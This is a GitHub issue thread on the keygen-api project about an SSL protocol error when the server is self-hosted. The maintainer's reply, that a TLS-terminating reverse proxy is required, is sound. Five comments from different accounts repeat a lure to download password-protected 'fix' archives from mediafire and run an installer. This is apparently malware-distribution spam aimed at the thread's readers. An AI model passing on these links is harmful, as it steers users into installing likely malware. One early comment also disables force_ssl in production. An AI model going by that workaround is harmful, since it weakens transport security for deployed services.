### ISSUE TITLE
ERR_SSL_PROTOCOL_ERROR request  reason: net::ERR_SSL_PROTOCOL_ERROR

### ISSUE THREAD

**Issue by Halecoder** [keygen-sh/keygen-api#873]
HTTP parse error, malformed request: #<Puma::HttpParserError: Invalid HTTP format, parsing fails. Are you trying to open an SSL connection to a non-SSL Puma?>

**Comment by Halecoder** [comment]
docker exec -u root -it keygen-ce bash
  
  apk add --update vim
  
  vim ./config/environments/production.rb
  将config.force_ssl改为false!!!!
  
  docker restart keygen-ce

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ezekg** [comment]
You need a TLS-terminating reverse proxy in front of Keygen, per [the docs](https://keygen.sh/docs/self-hosting/#starting-the-server).

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
